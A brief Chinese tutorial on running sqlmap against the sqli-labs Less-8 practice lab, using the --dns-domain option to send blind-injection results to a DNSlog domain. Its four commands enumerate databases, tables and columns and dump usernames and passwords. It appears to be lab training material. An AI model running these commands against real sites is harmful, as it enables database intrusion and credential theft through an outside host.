目錄
爆庫
爆表
爆列
爆數據
sqlmap+DNSlog 外帶參數 –dns-domain參數注入
–dns-domain參數為dnslog平臺的域名(我們也可以使用本地)
爆庫
python sqlmap.py -u "http://127.0.0.1/sqli/less-8/index.php/?id=1" -technique=B -dns-domain "域名" -dbs
爆表
python sqlmap.py -u "http://127.0.0.1/sqli/less-8/index.php/?id=1" -technique=B -dns-domain "域名" -D 庫名 -tables
爆列
python sqlmap.py -u "http://127.0.0.1/sqli/less-8/index.php/?id=1" -technique=B -dns-domain "域名" -D security -T users –columns
爆數據
python sqlmap.py -u "http://127.0.0.1/sqli/less-8/index.php/?id=1" -technique=B -dns-domain "域名" -D security -T users -C username,password –dump